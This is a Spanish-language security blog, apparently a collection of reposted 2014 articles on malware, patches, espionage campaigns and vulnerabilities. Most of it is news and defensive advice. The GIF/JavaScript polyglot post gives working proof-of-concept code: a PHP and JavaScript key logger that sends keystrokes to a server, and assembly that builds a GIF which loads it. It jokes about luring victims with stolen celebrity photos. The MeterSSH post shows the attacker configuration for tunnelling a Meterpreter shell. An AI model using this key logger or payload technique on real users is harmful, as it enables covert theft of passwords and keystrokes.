Suscribete a Mi Canal en YOUTUBE , da Click --> AQUÍ.

Canal acádemico donde se enseñará como atacan los ciberdelincuentes y como protegerse de estos ataques.

viernes, 28 de noviembre de 2014

Cigarrillos electrónicos chinos propagan malware.

Según informes, los delincuentes están utilizando cigarrillos electrónicos para propagar malware mediante un puerto USB a los equipos, cuando los usuarios los enchufan para cargarlos.

Según un post publicado en Reddit este malware se descubrió cuando "un ejecutivo de una gran empresa" se infectó desde un origen indeterminado, después de dejar de fumar y de haber comenzado a utilizar cigarrillos electrónicos fabricados en China y comprados en eBay por U$S5.

Rik Ferguson de Trend Micro, considera plausible el asunto y dice que: "la línea de producción de malware ha cambiado desde hace unos años, infectando a marcos de fotos de Samsung, reproductores de MP3 y mucho más".
China Made E-Cigarettes Could Infect Your Computer with Malware
"Los delincuentes son capaces de explotar cualquier dispositivo electrónico para servir malware a una red mal protegida", dijo Pierluigi Paganini de Security Affairs. "A pesar de eso, la idea es graciosa... Cuántos cigarrillos electrónicos se pueden cargar por USB mediante un cable especial o insertando un extremo del cigarrillo directamente a un puerto USB."

De hecho la idea es similar a BadUSB, utilizar un "dispositivo portador" del código dañino y esperar que un usuario lo enchufe en su computadora para infectarla. La solución es deshabilitar los puertos USB o dejarlos sólo habilitados para dispositivos permitidos previamente.

____________________________________________________________________

Tomado de: http://blog.segu-info.com.ar/2014/11/cigarrillos-electronicos-chinos.html#cigarrillos-electronicos-chinos
Se respetan derechos de autor.

miércoles, 26 de noviembre de 2014

Urgente, Actualización crítica de Flash Player (Actualiza!)


Adobe ha lanzado una actualización urgente fuera de ciclo para una vulnerabilidad crítica de ejecución remota de código en su popular reproductor Flash Player. La vulnerabilidad está siendo actualmente explotada in-the-wild.

La vulnerabilidad crítica (CVE 2014-8439) en Flash Player para Windows, Mac y Linux fue mitigada originalmente hace más de un mes en la versión del 14 de octubre de 2014, pero un investigador francés de Kafeine encontró un exploit activo en los Angler Exploit Kit y Nuclear Exploit Kit después de que Adobe publicara el parche.

Según F-Secure, a vulnerabilidad permite a un atacante ejecutar código arbitrario debido a una debilidad en la forma en que se maneja un puntero sin referencia a memoria. Un atacante podría crear un archivo Flash especialmente diseñado para activar la vulnerabilidad, que conduciría a la ejecución del código del atacante con el fin de tomar el control del sistema de la víctima.

En su boletín APSB14-26, Adobe clasificó la vulnerabilidad como crítica y por eso recomendados actualizar a la brevedad a Flash versión 15.0.0.239 en sistemas Windows, Mac OS X y Linux... o bien dejar de utilizar Flash Player.

Microsoft lanzará pronto actualizaciones de seguridad para Internet Explorer 10 y 11 y Google hará lo mismo para que Chrome. Para conocer su versión de Flash Player actual, visite esta página.

________________________________________________________________
Tomado de: http://blog.segu-info.com.ar/2014/11/actualizacioon-critica-de-flash-player.html#actualizacioon-critica-de-flash-player
Se respeta derechos de autor

lunes, 17 de noviembre de 2014

MeterSSH: Meterpreter sobre SSH

MeterSSH de TrustedSec es una manera fácil de inyectar código shell nativo en memoria y llevarlo al atacante a través de un túnel SSH. Todo con un único fichero Python que se puede convertir fácilmente en ejecutable usando PyInstaller o py2exe.

Sólo hay que editar el archivo meterssh.py y añadir la IP del servidor SSH, el puerto, el nombre de usuario y la contraseña:

user = “sshuser”
# password for SSH
password = “sshpw”
# this is where your SSH server is running
rhost = “192.168.1.1”
# remote SSH port – this is the attackers SSH server
port = “22”


Al ejecutarlo en la máquina de la víctima se lanzará un meterpreter mediante inyección en memoria (en este caso windows/meterpreter/bind_tcp) y lo asociará al puerto 8021 tunelizándolo con el módulo ssh Paramiko:



Después en el servidor del atacante ejecutaremos monitor.py para
supervisar la conexión SSH y el shell hasta iniciar automáticamente Metasploit:



Puedes descargar meterssh de la página de Github:

https://github.com/trustedsec/meterssh

___________________________________________________
Tomado de: http://www.hackplayers.com/2014/11/meterssh-meterpreter-sobre-ssh.html
Se respetan derechos de autor

sábado, 15 de noviembre de 2014

Vulnerabilidad Critica en Windows, 19 años de antiguedad, aplicar actualizaciones ya !

El bug fue descubierto por el ala de seguridad de IBM y reportado a Microsoft. Los de Redmond ya lanzaron parches para Windows Vista, 7 y 8.1; XP fuera de soporte.

El bug vivió nada menos que 19 años, aunque no podrá alcanzar con vigor la barrera de las dos décadas. Tal como informa The Verge, hacia comienzos de año investigadores del departamento de seguridad informática de IBM dieron con una falla que afecta a todas las versiones de Windows desde 1995 a esta parte, y la reportaron luego a Microsoft. Ahora, los de Redmond han lanzado un parche que llega para remediar el longevo bug.

Este agujero de seguridad propicia ataques remotos mediante la ejecución de un código, obligando a Windows (en específico a los navegadores Internet Explorer 3.0 en adelante) a visitar una URL. En tanto, afecta a todas las versiones de Windows: XP, Vista, 7, 8, 8.1, incluso en las versiones RT.
Microsoft ya ha lanzado parches para Windows 8.1, Windows 7 y Windows Vista. Tal como señala la fuente, Windows XP queda por fuera del “salvataje”, puesto que, tal como informamos en la ocasión, la compañía ya no brinda soporte para aquella versión del sistema operativo.

The Verge indica que el bug ha sido calificado con 9.3 puntos sobre 10 por la CVSS, por lo cual es más que recomendable descargar el parche. En esta línea, el sitio Ars Technica habla de una vulnerabilidad que reviste una “potencial catástrofe”.

“Darkhotel”, altos ejecutivos víctimas de espías de elite

Kaspersky Lab explica la campaña “Darkhotel”, donde altos ejecutivos son víctimas de espías de elite

La campaña de espionaje " Darkhotel" lleva cuatro años robando datos confidenciales de altos ejecutivos corporativos que viajan por el extranjero, mientras se hospedan en hoteles de lujo.

Expertos del equipo GReAT (de Análisis e Investigación Global) de Kaspersky Lab investigaron sobre la campaña de espionaje ” Darkhotel”, que ha operado subrepticiamente durante al menos cuatro años y que ha robado datos confidenciales de altos ejecutivos corporativos seleccionados que viajan por el extranjero. “Darkhotel” ataca a sus objetivos cuando éstos se hospedan en hoteles de lujo.
“El grupo nunca va tras el mismo objetivo dos veces; realizan sus operaciones con precisión quirúrgica, y obtienen todos los datos valiosos que pueden desde el primer contacto; luego borran las huellas de su trabajo y se esconden en las sombras a la espera del próximo individuo de alto perfil”, escribe Kaspersky en un informe.
Los objetivos viajeros más recientes incluyen altos ejecutivos de los Estados Unidos y Asia que realizan viajes de negocios e invierten en la región Asia-Pacífico: directores ejecutivos, vice presidentes, directores de ventas y marketing así como personal importante de Investigación y Desarrollo han sido blanco de ataques. ¿Quién sigue? Esta amenaza aún está activa, advierte Kaspersky Lab.
Modus operandi
El actor Darkhotel mantiene una intrusión eficaz instalada en redes hoteleras, el cual ha proporcionado un amplio acceso a través de los años, incluso en sistemas que se consideraban seguros y privados. Esperan hasta que, una vez registrada, la víctima se conecte a la red Wi-Fi del hotel e ingrese su número de habitación y apellido en el inicio de sesión. Los atacantes pueden ver al huésped en la red comprometida y lo engañan para que descargue e instale un backdoor (puerta trasera) que pretende ser una actualización de software legítimo – Google Toolbar, Adobe Flash o Windows Messenger. El ejecutivo desprevenido descarga este “paquete de bienvenida” del hotel, sólo para infectar su máquina con un backdoor, software de espionaje de Darkhotel.
Una vez en un sistema, el backdoor ha sido y puede ser utilizado para seguir descargando herramientas para robo más avanzadas: un registrador de teclas avanzado firmado digitalmente, el Troyano “Karba” y un módulo para robo de información. Estas herramientas recogen datos sobre el sistema y del software anti-malware instalado en él, roba todas las pulsaciones de teclas, y caza las contraseñas almacenadas en caché en Firefox, Chrome e Internet Explorer; Gmail Notifier, Twitter, Facebook, Yahoo! y las credenciales de inicio de sesión de Google, así como otra información privada. Las víctimas pierden información confidencial – probablemente la propiedad intelectual de las entidades de negocio que representan. Después de la operación, los atacantes cuidadosamente borran sus herramientas de la red del hotel y se esconden nuevamente.
Kurt Baumgartner, Investigador Principal de Seguridad en Kaspersky Lab, señala que “en los últimos años, un robusto actor llamado Darkhotel ha realizado una serie de ataques con éxito contra personalidades de alto perfil, empleando métodos y técnicas que van mucho más allá del comportamiento típico de la ciberdelincuencia. Esta amenaza tiene competencia operativa, capacidades ofensivas matemáticas y crypto-analíticas, y otros recursos que son suficientes para abusar de redes comerciales de confianza y ataca categorías de víctimas específicas con precisión estratégica”.
Sin embargo, la actividad maliciosa de Darkhotel puede no ser coherente: es indiscriminado en su propagación de malware junto con sus ataques muy concretos.
“La combinación de ataques indiscriminados y selectivos se está haciendo cada vez más común en la escena de las Amenazas Persistentes Avanzadas, donde los ataques selectivos se utilizan para comprometer a víctimas de alto perfil, y las operaciones al estilo botnet se utilizan para vigilancia de masas o para realizar otras tareas como partes hostiles DDoSing o simplemente actualizar víctimas interesantes para herramientas de espionaje más sofisticadas”, añade Kurt Baumgartner.
Los investigadores de Kaspersky Lab indicaron que los atacantes dejaron una huella en una cadena dentro de su código malicioso señalando a un actor de habla coreana. Los productos de Kaspersky Lab detectan y neutralizan los programas maliciosos y sus variantes utilizadas por la herramienta Darkhotel. Kaspersky Lab está trabajando actualmente con organizaciones relevantes para atenuar el problema.
Cómo protegerse de Darkhotel
“Cuando viaje, cualquier tipo de red, incluso las semi-privadas en hoteles, se deben considerar como potencialmente peligrosas”, explica Kaspersky, agregando que el caso Darkhotel ilustra un vector de ataque en evolución: individuos que poseen información valiosa pueden ser víctimas fáciles incluso de Darkhotel, ya que aún está activo, o a algo parecido a un ataque Darkhotel.
Para evitar esto, Kaspersky Lab ofrece los siguientes consejos:
- Elija un proveedor de Red Privada Virtual (VPN) – obtendrá un canal de comunicación cifrado para acceder a redes Wi-Fi públicas o semipúblicas;
- Cuando viaje, siempre considere las actualizaciones de software como algo sospechoso. Confirme que el instalador de la actualización propuesto esté firmado por el proveedor correspondiente.
- Asegúrese que su solución de seguridad para navegar en Internet incluya una defensa proactiva contra las nuevas amenazas y no sólo una protección básica antivirus.
- Para obtener más información acerca de consejos de privacidad, por favor visite cybersmart.kaspersky.com/privacy

____________________________________________________________________________
Tomado de:http://diarioti.com/kaspersky-lab-explica-darkhotel-donde-altos-ejecutivos-son-victimas-de-espias-de-elite/84368
Se respetan derechos de autor. 

sábado, 8 de noviembre de 2014

Cuidado con los GIF's, le pueden Robar sus Contraseñas !

Tú mira este gif tan gracioso... y yo mientras te robo tus contraseñas (o el GIF que también quería ser Javascript)

Ange Albertini (padre de Angecryption que más adelante veremos) es sin duda un auténtico mago a la hora de crear binarios "políglotas", que son ficheros que tienen simultáneamente varios formatos. Por ejemploPDF/ZIP/JPG/Audio, PE/PDF/HTML/ZIP,TrueCrypt/PDF/ZIP, etc. Es decir, cada uno de estos ficheros pueden ser abiertos por varias aplicaciones sin error.

Una de las cosas que más nos interesan, dado el mundo de maldad y desenfreno en el que vivimos loshackers"piratas informáticos", es la técnica para abusar de la cabecera de los ficheros GIFs y añadir código Javascript. El resultado un fichero GIF que sea un fichero GIF y JS al mismo tiempo. 

Imaginad... basta con publicar anónimamente una copia de una de las últimas imágenes robadas de alguna famosa y recibiremos miles y miles de visitas de incautas (pero satisfechas) víctimas, cuyos navegadores ejecutan de forma silenciosa código javascript...

Ajin Abraham planteaba un escenario similar y muy interesante con Xenotic. Nosotros haremos también una simple PoC cargando un sencillo keylogger con php. Ni que decir tiene que la demo es básica y no incluye cifrado, técnicas de evasión, ni filtros JS... eso y las fotos guarras las pone cada uno... XD

Primero vamos a apañar nuestro keylogger que publicaremos con cualquier servidor web con soporte php (en nuestro caso XAMPP). Para ello añadiremos al DocumentRoot estos tres archivos y echaremos a correr:

keylogger.php

<?php
if(!empty($_GET['c'])) {
    $logfile = fopen('data.txt', 'a+');
    fwrite($logfile, $_GET['c']);
    fclose($logfile);
}
?>

keylogger.js

var keys = '';
document.onkeypress = function(e) {
    var get = window.event ? event : e;
    var key = get.keyCode ? get.keyCode : get.charCode;
    key = String.fromCharCode(key);
    keys += key;
}
window.setInterval(function(){
    new Image().src = 'http://localhost/keylogger.php?c=' + keys;
    keys = '';
}, 1000);


index.html

<img src="img.gif" />
<script src="img.gif"></script>

Como podéis comprobar en el index.html se llama al mismo fichero gif como si fuera un script JS. ¿Cómo conseguimos que esto luego funcione? Pues el "truco" está en añadir “=1″ para que el motor JS no considere los caracteres de la cabecera como una variable no definida. Y luego, para escapar caracteres especiales, usamos las marcas de comentario “/*” y “*/”. De esta manera podremos llamar al javascript keylogger.js. Veamos el ejemplo construyendo nuestro gif malicioso desde ensamblador:


WIDTH equ 10799 ;  equivalente a 2f2a, que es '/*' en ASCII, para empezar a abrir un comentario
HEIGTH equ 100 ; sólo para que sea más fácil de detectar
db 'GIF89a'
    dw WIDTH, HEIGTH
db 0 ; GCT
    db -1 ; color de fondo
    db 0 ; relación de aspecto por defecto
db 02ch  ; descriptor de imagen
    dw 0, 0 ; NW corner
    dw WIDTH, HEIGTH ; ancho y alto de la imagen
    db 0 ; color de la tabla
db 2 ; tamaño lzw
db 0
db 3bh ; terminador del gif
db '*/' ; cierre del comentario
db '=1;' ; para falso uso de esa cadena GIF89a
;db ' alert(1) '
db 's = document.createElement("script");' 
db 's.src = "http://localhost/keylogger.js";'
db 'document.body.appendChild(s);'

El resultado al compilarlo con YASM y visto en hexadecimal será el siguiente:

yasm gifjs.asm -o img.gif



Para comprobar que funciona abrimos la URL local con Chrome, vemos la imagen, pulsamos F12 y comprobamos que nuestro keylogger está en funcionamiento:






Tomado de: http://www.hackplayers.com/2014/11/el-GIF-que-tambien-queria-ser-JS.html
Se respetan derechos de autor.

martes, 4 de noviembre de 2014

Vulnerabilidad de Nivel CRITICO en DRUPAL 7 !

"Apocalipse" en Drupal 7: Hackeados por un Bug de SQL Injection en función de seguridad contra SQL Injection

Los titulares en los medidos de comunicación hablan de Apocalipse en Drupal 7 debido al bug de SQL Injection que se publicó el 15 de Octubre y que está siendo explotado de manera masiva y automatizada. El bug fue descubierto por Stefan Horst de Sektioneins y ha recibido el CVE-2014-3704. Dicho exploit a día de hoy ya es público y permite a cualquier atacante hacer un ataque de SQL Injection en el servidor sin necesidad de estar autenticado en la plataforma a través de unas funciones que en teoría son de seguridad para evitar ataques de SQL Injection.
Figura 1: Si no tienes la versión 7.32 probablemente estés hackeado
Desde ese momento, se habla de que probablemente, si tienes un Drupal 7 y no lo has actualizado a la versión 7.32 existe un alto grado de certeza de que esté comprometido. Lo que le hayan podido hacer a tu sitio depende. Pueden haberlo utilizado para distribuir malware, para meter paneles de control en ataques de phishing o simplemente para hacer BlackSEO, que siguen creciendo día a día el número de sitios infectados. Revisa en detalle tu sitio, y si no ves nada busca bien otra vez si no tienes el Drupal 7 actualizado.
Figura 2: El bug de SQL Injection está en el prepare stament que usa Drupal 7 para evitar SQL Injection
El equipo de Drupal publicó el Security Advisory  donde además deja recomendaciones de qué debes hacer si el sitio ha sido comprometido por un ataque. En él se dejan algunas reflexiones prácticas que debes tener en cuenta sobre cómo proceder para hacer un análisis forense del sitio, decisiones que debes tomar y medidas legales a ejecutar en cada caso.
Figura 3: Security Advisory de Drupal alertando de que es Highly Critical
Yo te recomiendo que actualices todo el software y reinstales una copia de seguridad anterior al 15 de Octubre, para evitar cualquier problema. Si el sitio ha sido comprometido pueden haber dejado backdoors a nivel de sistema operativo, a nivel de base de datos, a nivel de servidor web o a nivel de aplicación web. Por supuesto, si se han llevado los usuarios y las contraseñas debes cambiarlas todas sin excepción. 
Mi recomendación es que fortifiques el sistema pensando ya en el futuro y que establezcas una política de copia de seguridad que evite que pierdas muchos datos en un caso similar a posteriori. Recuerda que si quieres también puedes poner Latch en Drupal 7 para evitar que cualquier password sea utiliza sin consentimiento del usuario en un ataque futuro.
_________________________________________________________
Tomado de: http://www.elladodelmal.com/2014/11/drupal-7-hackeados-por-un-bug-de-sql.html
Se respetan derechos de autor.
 

sábado, 1 de noviembre de 2014

FrootVPN, VPN GRATIS para navegar de forma anónima y en todos los Sistemas Operativos.

Aparece un nuevo servicio de VPN a la palestra, de entre los muchísimos que hay, y que podréis consultar en este post de Yago en el que realiza una excelente recopilación de servicios VPN que se toman en serio la privacidad.
FrootVPN da un puñetazo en la mesa, y ofrece lo siguiente:
- Acceso por VPN mediante PPTP, L2TP y OpenVPN.
- Compatible con todos: Windows, Mac, Linux, iOS y Android
- Conexión desde varias ubicaciones, ideal para desbloqueo de contenido limitado por procedencia, como es el caso de Netflix, Skype, Youtube, Facebook, Spotify, Pandora y muchos más
- Anonimato y protección de identidad
- Sin límite de velocidad o uso, soporte 24x7, rapidez
- Completamente GRATIS

Tenéis toda la documentación disponible en el apartado de guías (Guides) dentro de su web, así como un Preguntas Frecuentes (FAQ) sobre el servicio y posibles problemáticas.

Por el momento no se sabe ningún desventaja, todo son buenas palabras y ha sido recomendado directamente desde el portal de ThePirateBay, el cual desde que apareció el anuncio, ha hecho que reciban más de 100.000 registros. 

Página principal de ThePirateBay en la que se promociona FrootVPN
¿Tendrá trampa? Esperemos que no...

Puedes registrarte a través del formulario que encontraréis nada más acceder a la web:


Formulario de registro al servicio FrootVPN
 _____________________________________________________________
Tomado de: http://www.securitybydefault.com/2014/10/frootvpn-vpn-gratis-para-navegar-de.html
Se respetan derechos de autor.

Axiom: nuevo grupo de espionaje chino

La empresa de seguridad informática Novetta Solutions, que encabeza una coalición de ciberseguridad que cuenta con el apoyo de compañías como Microsoft, FireEye, F-Secure, Cisco y Symantec, ha descubierto a un nuevo grupo de hackers chino que ha sido bautizado como Axiom [PDF].
Este grupo ha sido responsable de ataques a 43.000 ordenadores en todo el mundo, siendo sus víctimas, tanto organismos del gobierno y fuerzas de seguridad de los estados, organizaciones de derechos humanos, ONGs mediomabientales, empresas del índice Fortune 500 y compañías de Software.

Según desvelan desde Novetta Solutions, el grupo Axiom tiene lazos con el gobierno chino, y es más sofisticado que la Unidad 61398, una división del ejército del país comunista acusada de perpetrar importantes ataques el año pasado.

En el caso de Axiom se especula que ha estado en funcionamiento desde hace seis años y ha sido responsable de ataques como el realizado contra Google en 2010, que se conoce como Operación Aurora, tal y como informan en Mashable. La noticia se ha producido días antes de la visita a Pekín que realizarán Barack Obama y John Kerry, donde se encontrarán con políticos chinos para discutir aspectos como la ciberseguridad.
_____________________________________________________
Tomado de: http://blog.segu-info.com.ar/2014/11/axiom-nuevo-grupo-de-espionaje-chino.html#axiom-nuevo-grupo-de-espionaje-chino
Se respetan derechos de autor.

Diversas vulnerabilidades en IBM WebSphere Portal

Se han anunciado seis vulnerabilidades en IBM WebSphere Portal que podrían permitir a un atacante remoto construir ataques de cross-site scripting, cross-site request forgery, denegación de servicio, revelación de información e incluso ejecutar código arbitrario en los sistemas afectados.
IBM WebSphere Portal ofrece una aplicación compuesta o infraestructura de "mashup" empresarial y las herramientas para crear soluciones basadas en SOA (Arquitectura Orientada a Servicios). WebSphere Portal contiene una amplia variedad de tecnologías destinadas a desarrollar y mantener portales B2C, B2B y B2E.
Una vulnerabilidad, con CVE-2014-4814, que podría permitir a un atacante provocar una denegación de servicio si un usuario abre un archivo XML específicamente manipulado. Afecta a WebSphere Portal 8.5, 8.0, 7 y 6. Otra vulnerabilidad de la que IBM no ha ofrecido detalles, con CVE-2014-4808, puede considerarse la vulnerabilidad más grave de todas ya que permite la ejecución remota de código. Afecta a WebSphere Portal 8.5, 8.0, 7 y 6.
Con CVE-2014-4821 una vulnerabilidad que podría permitir a un atacante identificar si un archivo existe o no en base a los códigos de error del servidor. Afecta a WebSphere Portal 8.5, 8.0, 7 y 6. Una vulnerabilidad de cross-site request forgery, con CVE-2014-6125, y otra de cross-site scripting, con CVE-2014-6126, que afectan a WebSphere Portal 8.5.
Por ultimo, con CVE-2014-5191, una vulnerabilidad de cross-site scripting en el Preview Plugin del CKEditor. Afecta a WebSphere Portal 8.5, 8.0.
IBM ha publicado diferentes correcciones para evitar estos problemas. Dada la diversidad de versiones afectadas y parches se recomienda consultar el aviso
Más información:
Security Bulletin: Fixes available for Security Vulnerabilities in IBM WebSphere Portal (CVE-2014-4814; CVE-2014-4808; CVE-2014-4821; CVE-2014-6125; CVE-2014-6126)
Security Bulletin: Fixes available for Security Vulnerabilities in CKEditor that affect IBM WebSphere Portal (CVE-2014-5191)
___________________________________________________________
Tomado de: http://unaaldia.hispasec.com/2014/11/diversas-vulnerabilidades-en-ibm.html
Se respetan derechos de autor.